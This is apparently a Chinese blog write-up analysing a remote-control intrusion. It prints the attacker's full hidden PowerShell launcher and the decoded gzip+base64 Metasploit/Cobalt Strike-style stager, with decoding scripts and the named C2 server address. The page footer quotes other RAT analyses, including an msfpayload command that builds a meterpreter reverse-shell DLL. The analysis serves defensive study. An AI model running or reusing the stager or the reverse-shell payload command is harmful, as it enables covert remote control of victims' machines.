一起应急远控事件分析

攻击者执行的Powershell命令如下:

pwd=asasd3344&cmd=cmd /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnACcASAA0AHMASQBBAEgALwBUAEUAbAAwAEMAQQA3AFYAVwBiAFcAKwBiAFMAQgBEACsAbgBFAGoANQBEADYAaQB5AEIAQwBpAE8AagBWAE8AbgBUAFMATgBWAE8AcgBBAGgAeAByAFYAVABVADIAegBzADIARwBlAGQATQBLAHgAaAA0ADIAVQBoAHMATQBRAG0AdgBmADcAMwBtADcAVQBoAFQAYQAvAHAAWABYAHYAUwBJAFMAVAAyAFoAVgA2AGUAbQBYAGwAMgBoADMAVgBPAFAAWQBaAGoASwBuAGkASgBKAFgAdwArAE8AVAA0AGEAdQBhAGsAYgBDAFYATABOAHUAMgBqAFgAaABkAG8AcQBVAE8AUwBqAEkAMQBpAHUAWgBmAGQATwBJAEwAdwBYAHAASQBXAGEASgBOADAANABjAGoARgBkAFgAbAAxADEAOABqAFIARgBsAEIAMwBtAGoAVwB2AEUAMQBDAHgARAAwAFkAcABnAGwARQBtAHkAOABLAGMAdwBEAFYARwBLAHoAagA2AHUANwBwAEQASABoAE0AOQBDADcAWQAvAEcATgBZAGwAWABMAGkAbgBGAGkAbwA3AHIAaABVAGcANABVADYAbgBQADkAdwBhAHgANQAzAEkAcwBEAFQAcwBoAG0ARQBuAGkANwA3ACsATAA4AHUASwBzAHQAVwB6AG8AOQA3AGwATABNAGsAbQAwAGkANAB5AGgAcQBPAEUAVABJAHMAcgBDAEYANQBrADcASABCAGMASgBrAHMAUQBoADkAdABJADQAaQA5AGUAcwBNAGMAWAAwADkAWABsAGoAUQBqAE4AMwBqAFcANwBBADIAZwBNAGEASQBoAGIARwBmAGkAYgBLAEUAQQBXADgASwBXAEoANQBTAG8AVgA5AFAATgB6AEEAWQBWAHMAUwBZAFQAaABLAFkAMAAvADEALwBSAFIAbABtAFYAZwBYAEYAdAB6ADAAWQByAG4AOABUAFYAcQBVAGYAagAvAGwAbABPAEUASQBOAFUAegBLAFUAQgBvAG4ATgBrAG8AZgBzAEkAZQB5AFIAcwArAGwAUABrAEcAZgAwAEgAbwBKAFcAagBaAEwATQBRADIAVwBzAGcAeABpAEQALwBFAEcAUwBUAFcAYQBFADEASQBYAGYAcwBXAE0AZABJAE8AMgBWAGQAWgArAFYAawBsADYAcgBnAFIAUwBJADUAYgBLAGQAYQBqAGoAQwAzAEUATwBZAHoAOABuADYASwBBAHAAdgBnAEMAVQAxADEANgBHAHAANgB3AC8ASgBPADcATAB5AGYASABKADgAYgBxAGkAeQByADMAZABmAGsANABWAEcAQgAwAHQAOQBtAE0ARQAyAEsAUgBSAG4ATwBHADkAMgBIAHQAQgBxAFEAdABEADgATwBLAHkATwBDADEAZwBXAGgAdQBuAE8AWgBLAFgAVAA1AGsAVgBhAGsAaQA3AHEALwA5AFkAdgBWAFgASgBnAGkAVABoADUARgBzADQATQBmAGEAWABvAEYARABXAHMAZwBaAFYANQBzAHMALwBwAG0AUQBYAHIAVABGAEYAMwBZAEsANgBFAGYAWQBxADEAawBrAHYANQBSAGUAdABDAGQAcQBIADEANgBqAEUAYgBnAEMAUgBKAEoAWQBiAHkATwA4AGkAZwBnAEsAWAA4AFkAegB4AE0AbgArAG4AcABrAGUAWQBQAGUAbABxAE8AUwBZACsAUwBsAFUAUABhAHAAUQBCAEsAaQBpAGYALwBDADIAWQBRAHgARQBrADAAYQBSAEQARgBFAEYAKwBEAG4AUABnAFgAVwAwAE4AWABFAGUAVgBkAE0AbgB2AG8AdgBMAE8ANQB5AEEAawBkAG8AaQBiAFoAWABWAGgAbABNAE4AaAA4ACsAcQBDAGoAVgB5AEMALwBMAHEAZwAwAGcAeQBYAFcAMgByAE8ANAB2ADEAUQAvAEEAcAAzAG0AQgBPAEcAUABUAGQAagBsAGIAbQBsAFgASwBhAHgAZABOAGUASgBhAGMAYgBTADMASQBPAEsAUQBlAGgAagBPADAARQBlAGQAZwBuAFAAUgBGADMAbwBZAFIAOQBwAGgAWQAyAEQAeQBxADMANABZAGgANAA2AEwAaQBGAHcAQQBzAEQAUwBBADkAUQBCAFYAbgBqADgATgB1AE0AOABTAEEARQBoAHIANwBuAGMAcwBCAEUAegBvADQAUwBnAEMARQBUADIAWgA5ADQAZwBiAGcAQQBuAHYASwBUADUAbgBqAGQAdQBnAEgAegB4AGIALwBnAHEARgBoADgAbwB5AHgATgBSAFoAZQBBAFoATwBxAGkAdQBUAFcASgBXAEYAeAB5AGMATQByAGcANQBlAEYASgBKADgASgA5AGMAUAA3ADgAdwBBAEUAUQBuAFIAVwBVAE4AcABPAHAAVQBMAEwAUwBDAGMAVABMAFgASAB2AFUAZAA1ADIASwBaAGsASAAzADQASwBZAFAAUQBqAFQAUwBPAE4ARABkAEQAYgA5AHEASABxADAARgA2ADEAZABSAHgAOQAyAEwAVQBqAFIAOQBWAGUASABUAGoAawArAFYAbwA5AHMAUwBaAG0AMABPAC8AVAAyAHkAVAAyAGIAYwA2AEgAawB6AEMAMABNAFEAdABNADQAQgA1AE0AZABHAEQARQBWAE8AUwBEACsATgB4AHIAMgA5ADMAZQAyAHIAYQAzAFkAVgByADEAYwB4AE0AdgBhAGMAVgBWAGsAdABUAHYAUgA1ACsANgAvAFMAMQB5AFEAVAAwAGMARwBkAGcAMwBlADEATQAxAGQAZQBpAFkAQgBiAGMAZAByAGIAbQBLAEoAeQBaADQASwBnAHoAQwBNAHcAQQB2AHAAbwBaAGUAcABvAHkAVgB3AEoATgBNAFQAbwBEAFcAdwB0ADEAcgBLAGkAQgBiAGYAVwBzAGQAbQB0AHUATgBpACsASgBoAGgAOQB0ADAAMQBaADcAMAB5AGQALwBUADMANwAwAGQAcgBzADMAMgA0ADMAVgBtADIARgBmAEQAWQAyAFAAdgB0AEUANgBOAC8AYgA2AEcANgA0AC8AMwAxAHcAUAB1AHYAcAArADcAdgBHADUAZABaAHYAcABXAEEAYwAvAHUAbgBGAHIATwBTAEcAYQBPAG8AawAyADEAWQAyADUANQBTAFIAbQBjAEwAbwBOAEwARwBmAFEAYgBCAHUAaABCAHUAcwBtADMAZwAwAFMAdQB3AGwAUABxADkAVgAvAG8AUAA3AGoAawBGAHcAKwBEAGcARwB1ADUAYwB6ADcARwBNADMATgBBAEIAVwBCAGEAcQBtAHEAZgBVAHUASgB2AGQAcAAyAFYAUABYADYAcgBVAGYAbgA0ADQAdQBOAE0AWQBHADEAegBkAGkAawBPADIAdQBWAEQAUAAzAGkAdAB0AGQAOAA1AHcAdwB4AFMAbQBMAFYAMABsAFgAVgBJAEgAQQBXAEkAOQBYAGQAZABwAHUAdABhAGYAegBCAGMAaQA2AHMAaQBhADcAcwBpAG8AbQB5ADIAKwBwADMAegBhADIATwArADkAdABOACsAWgAxAGMAdgAzAGsAVABOAE4AZgB0AFUAZABPAHgAVABkAHAAegBRAHcAMwB3AEYAdgAzADIAQgB2AGQAUABZAFMAOQB5AEgAZQBWADIAMwBYAFIANAAvAHIAbwA2AGIAVAA3AFMARwBYAEYASABuAFYAWgBNAFYAcwAzAFcAQgBIAGYAZgBhAHAAcQBKAFUAZgA5AG0ANgBKAEYANwBEAFcASQBHAEcAeABmAFcASwB1ADYAYwBlACsARQBhAE0ASgBuAEIAcABSAFgATQBZAG4AcgB1AGIAcwBEAHUATgBGAEEAQgBIAGMAUQBIAGQAVgA3ADMAVABkAEQAUgBjAG8ASQAzAGsAOQBNAFoAdAA5AFgAZgBLAGwARgAvAHAAMwBDAGMAVQBmADgAUwBzAEoAMgBYAEcARgBSAEcAegBWAGsAVAA4AEsAbQA5AHIAdAAyAGgAMQA3AFkANQBPAC8AZQBSAG8AVABWAFAAdgBmAGUAdgBPAEcATwBCAHMAagBVADAAZQBQAGUATQBpAGoAOQBxAEgAVQBNADMAegBVAEsAWABBAEUAVwBoAEoAMQBRAFgAZwBoAEcAbgBSAG4AbgBQAGoAMgBMAE0ATgBTAFMASgAvAHgAcABzAFUARQBvAFIAZwBkAFkASwB6AGIAYwA2AFYAeQBvAGgAcwBjAGUAYgBEAEcAOABJADAATgA4AE8AWABZAGMAMwB3AFEAawBNAFgANQArAC8ATwBKAEsARgBKADAASAA1AGEAKwArAHAAbABxADYAdQA1AG8AQQBSAGoAaQBxAGMAcABzAFkAQQAwAFkAQwBGAGQAVwBYADMAVwBsAEcAZwBsAFMAaQA3AHQAZwBJAFIALwBuAHgAWQBuAFQAZwBwAEoARwA2AHAAegBqAHMAUgB6ADAAcABwAG0ATwB3AE4AeQAvAHoANAAxAG4ASgBGAGUANQBqACsAcgA5AGsAcQBMADQAMABRAFAAdgA2AC8AWgBPAHYAcgAyAGoALwBzAC8AbABRAEcAbABmAG8AKwAzAHUAOQBXAHYAMQAzADQAcABYAFQAKwBhAHQAeABUAEYAegBNAFEAdABPAEgATwBJACsAagBRAGIAVgA4AE0AdgArAFQARgBzAHgAKwBSAGYAVQAyAGcANwB1AHYAeQA0AGIAKwBTAEgAMwBOADIAZABnAE0ALwBLAEMAZgBIAGYAdwBIADIAZwB3AHkAdABzAHcAbwBBAEEAQQA9AD0AJwAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApA

当中的字符串进行base64解密得出内容如下:

if([IntPtr]::Size -eq 4){$b=$env:windir+‘\sysnative\WindowsPowerShell\v1.0\powershell.exe‘}else{$b=‘powershell.exe‘};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=‘-nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(‘‘H4sIAH/TEl0CA7VWbW+bSBD+nEj5D6iyBCiOjVOnTSNVOrAhxrVTU2zs2GedMKxh42UhsMQmvf73m7UhTa/pXXvSIST2ZV6emXl2h3VOPYZjKniJJXw+OT4auakbCVLNu2jXhdoqUOSjI1iuZfdOILwXpIWaJN04cjFdXl118jRFlB3mjWvE1CxD0YpglEmy8KcwDVGKzj6u7pDHhM9C7Y/GNYlXLinFio7rhUg4U6nP9wax53IsDTshmEni77+L8uKstWzo97lLMkm0i4yhqOETIsrCF5k7HBcJksQh9tI4i9esMcX09XljQjN3jW7A2gMaIhbGfibKEAW8KWJ5SoV9PNzAYVsSYThKY0/1/RRlmVgXFtz0Yrn8TVqUfj/llOEINUzKUBonNkofsIeyRs+lPkGf0HoJWjZLMQ2WsgxiD/EGSTWaE1IXfsWMdIO2VdZ+Vkl6rgRSI5bKdajjC3EOYz8n6KApvgCU116Gp6w/JO7LyfHJ8bqiyr3dfk4VGB0t9mME2KRRnOG92HtBqQtD8OKyOC1gWhunOZKXT5kVaki7q/9YvVXJgiTh5Fs4MfaXoFDWsgZV5ss/pmQXrTFF3YK6EfYq1kkv5RetCdqH16jEbgCRJJYbyO8iggKX8YzxMn+npkeYPelqOSY+SlUPapQBKiif/C2YQxEk0aRDFEF+DnPgXW0NXEeVdMnvovLO5yAkdoibZXVhlMNh8+qCjVyC/Lqg0gyXW2rO4v1Q/Ap3mBOGPTdjlbmlXKaxdNeJacbS3IOKQehjO0EedgnPRF3oYR9phY2Dyq34Yh46LiFwAsDSA9QBVnj8NuM8SAEhr7ncsBEzo4SgCET2Z94gbgAnvKT5njdugHzxb/gqFh8oyxNRZeAZOqiuTWJWFxycMrg5eFJJ8J9cP78wAEQnRWUNpOpULLSCcTLXHvUd52KZkH34KYPQjTSONDdDb9qHq0F61dRx92LUjR9VeHTjk+Vo9sSZm0O/T2yT2bc6HkzC0MQtM4B5MdGDEVOSD+Nxr293e2ra3YVr1cxMvacVVktTvR5+6/S1yQT0cGdg3e1M1deiYBbcdrbmKJyZ4KgzCMwAvpoZepoyVwJNMToDWwt1rKiBbfWsdmtuNi+Jhh9t01Z70yd/T370drs3243Vm2FfDY2PvtE6N/b6G64/31wPuvp+7vG5dZvpWAc/unFrOSGaOok21Y255SRmcLoNLGfQbBuhBusm3g0SuwlPq9V/oP7jkFw+DgGu5cz7GM3NABWBaqmqfUuJvdp2VPX6rUfn44uNMYG1zdikO2uVDP3ittd85wwxSmLV0lXVIHAWI9XddputafzBci6sia7siomy2+p3za2O+9tN+Z1cv3kTNNftUdOxTdpzQw3wFv32BvdPYS9yHeV23XR4/ro6bT7SGXFHnVZMVs3WBHffapqJUf9m6JF7DWIGGxfWKu6ce+EaMJnBpRXMYnrubsDuNFABHcQHdV73TdDRcoI3k9MZt9XfKlF/p3CcUf8SsJ2XGFRGzVkT8Km9rt2h17Y5O/eRoTVPvfevOGOBsjU0ePeMij9qHUM3zUKXAEWhJ1QXghGnRnnPj2LMNSSJ/xpsUEoRgdYKzbc6VyohscebDG8I0N8OXYc3wQkMX5+/OJKFJ0H5a++plq6u5oARjiqcpsYA0YCFdWX3WlGglSi7tgIR/nxYnTgpJG6pzjsRz0ppmOwNy/z41nJFe5j+r9kqL40QPv6/ZOvr2j/s/lQGlfo+3u9Wv134pXT+atxTFzMQtOHOI+jQbV8Mv+TFsx+RfU2g7uvy4b+SH3N2dgM/KCfHfwH2gwytswoAAA==‘‘))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))‘;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=‘Hidden‘;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s)

发现中间部分依旧还是不可见字符:

有点瑕疵,有base64的特征但并不全是base64,这里折腾了一下下,因为这个是powershell,之前没学过,临时学了一下powershell。

发现是先gzip压缩了,然后在base64的,所以反过来使用base64解密然后在gzip解压缩,使用python写了一个解密的脚本,代码如下:

# -*- coding: UTF-8 -*-
import gzip
import StringIO
import base64

compresseddata = base64.b64decode("""这里是刚才加密的字符串""")
compressedstream = StringIO.StringIO(compresseddata)
gzipper = gzip.GzipFile(fileobj=compressedstream)
data = gzipper.read()
print(data)

得到如下结果:

这里不难看出,这是metasploit跟cs惯用手法。那么现在需要找出其远控的c2服务器~

中间的c2服务器地址段被混淆了,继续解密

base64+编码混淆,这里是用前阵子学的shell写的一个fuzz代码,明天补上,写文章一下子没找到在哪儿~

cat data.txt | iconv -f UTF-16LE --to-code=UTF-8| base64 -D

cat b.txt | iconv -f UTF-16LE --to-code=UTF-8| base32 -d

推出最终的c2服务器地址为:114.118.83.230:443

原文地址:https://www.cnblogs.com/nul1/p/11668688.html

时间: 2024-11-05 13:03:55

一起应急远控事件分析的相关文章

【原创】一次远控木马分析

病毒来源:从VPS上发现此木马 提取样本后分析 文件名:vister.exe MD5:30866adc2976704bca0f051b5474a1ee 此处创建了一个进程 申明了一个2800大小的Space.buffer 并将地址mov到5123EA08 导入win32 api 创建了文件,继续走. Loadlibrary加载了msvcrt.dll,获取memcpy的函数地址. 这里调用了大量win32 API Manifest 创建打开config.cnt文件 在路径C:\WINDOWS\He

控制指令高达二十多种:远控木马Dendoroid.B分析报告( 转)

控制指令高达二十多种:远控木马Dendoroid.B分析报告 IT社区推荐资讯 - ITIndex.net Apr 24 近期,360团队截获了一款功能强大的专业间谍软件,它可以通过PC端远程控制中招用户的手机,控制指令高达二十多种,窃取用户手机通讯录,短信,照片及其它重要隐私数据.这个远控木马与去年知名的Android.Dendoroid木马家族手段非常相似,所以我们将其命名为 Android.Dendoroid.B. 一.木马Android受控端恶意行为分析 ‍‍ 1.释放文件,隐藏图标,启

老王教你分析远控木马是怎样工作的

本 来是一个朋友给我,要我找下后门的,可是这远控太强大了,而且作者的汇编基础非常强,就没找到,倒是无巧不成书的,发现了他的隐藏技术,瞬间感觉喜欢上 了,于是写成了win32 分享下,3分钟前,主动防御会拦截,但是电脑重启后  程序可以运行,现在又测试了下,已经变成高危病毒了,无语的360啊...源码如下,各位可以根据 需要修改: [AppleScript] 纯文本查看 复制代码 ? 001 002 003 004 005 006 007 008 009 010 011 012 013 014 0

Android中Preference的使用以及监听事件分析

> 在Android系统源码中,绝大多数应用程序的UI布局采用了Preference的布局结构,而不是我们平时在模拟器中构建应用程序时使用的View布局结构,例如,Setting模块中布局.当然,凡事都有例外,FMRadio应用程序中则使用了View布局结构(可能是该应用程序是marvel公司提供的,如果由google公司做,那可说不准).归根到底,Preference布局结构和View的布局结构本质上还是大同小异,Preference的优点在于布局界面的可控性和高效率以及可存储值的简洁性(每个

python+msf make windows远控

分析的一个远控,感谢wstone的指导~ 创建dll ./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444 -t dll X > /tmp/sc.dll python main.py import sys, os import shutil import time import ctypes import glob import multiprocessing import multiprocess

DuiLib事件分析(一)——鼠标事件响应

最近在处理DuiLib中自定义列表行元素事件,因为处理方案得不到较好的效果,于是只好一层一层的去剥离DuiLib事件是怎么来的,看能否在某一层截取消息,自己重写. 我这里使用CListContainerElementUI行元素,元素中有插入button,平时行元素不显示,鼠标移动上去显示出来,鼠标移走就隐藏button.Duilib自己是不带这个功能的,它有一个鼠标移动上去的热点事件,按理说重写热点事件就好了.但是当时比较急没找到怎么触发的,之后一直没继续走这条思路.后来找到源码事件里面有 vo

【Android 1.6】View和ViewGroup的touch事件分析和总结

ENV: android 1.6 目前Android版本已经到了7.0(nougat)了,Android 随着版本升级,touch事件的源码也在跟随着系统的升级而写得越来越复杂,加入了很多旁枝末节,这些旁枝末节,对于分析流程是一种干扰:由于Android的版本升级是向下兼容的,万变不离其宗,研究Android早期的版本,可以更容易理解touch事件的分发,本篇以Android1.6版本的源码进行讲解,由简及繁,理解了早期的源码,再进入高版本的研究也会更容易许多. 前言: View事件的派发其实非

cocos2dx 点击事件分析(3)

1.在cocos2dx 点击事件分析(2)中,我们已经从java端分析了,单手触摸和多手触摸屏幕. num --- 1,不论单点触摸还是多点触摸,这个值都是1 ids[] --- 触摸事件的ID void CCEGLViewProtocol::handleTouchesBegin(int num, int ids[], float xs[], float ys[]) { CCSet set; for (int i = 0; i < num; ++i) { int id = ids[i]; flo

国内某厂商摄像头敏感信息泄露漏洞事件分析

国内某厂商摄像头敏感信息泄露漏洞事件分析 PDF 版报告下载: 国内某厂商摄像头敏感信息泄露事件分析English Version: Webcam Sensitive Information Disclosure Vulnerability Analysis 1. 事件概述 国内某家监控产品供应商和解决方案服务商旗下有多款监控摄像机以及相关的配套设备.2017年3月5日,知道创宇旗下漏洞平台Seebug[0]上收录了一位名为"bashis"的国外安全研究员发布了一个漏洞公告,声称该厂商